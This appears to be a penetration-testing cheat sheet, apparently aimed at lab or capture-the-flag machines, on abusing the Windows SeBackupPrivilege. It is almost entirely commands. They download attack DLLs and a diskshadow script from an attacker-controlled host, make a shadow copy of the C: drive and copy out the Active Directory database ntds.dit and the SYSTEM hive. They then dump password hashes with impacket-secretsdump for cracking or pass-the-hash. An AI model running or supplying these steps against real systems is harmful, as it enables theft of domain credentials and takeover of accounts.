First check if the current user has SeBackupPrivilege in the privilege information.
If so, we can read arbitrary files on the system include administrator's files, SAML file, SYSTEM registry file, etc.
In local machine, download malicious dlls from
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copied!
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
Copied!
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
Copied!
Upload this file to remote machine.
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt
# If winrm,
upload diskshadow.txt
Copied!
Then execute diskshadow.exe.
# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt
Copied!
# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM c:\tmp\system
download ntds.dit
download system
Copied!
Now we have two files (ntds.dit and system) in local machine.
We can dump password hashes using the files.
impacket-secretsdump -ntds ntds.dit -system system LOCAL
Copied!
After that, crack the hashes or use them for pass-the-hash.
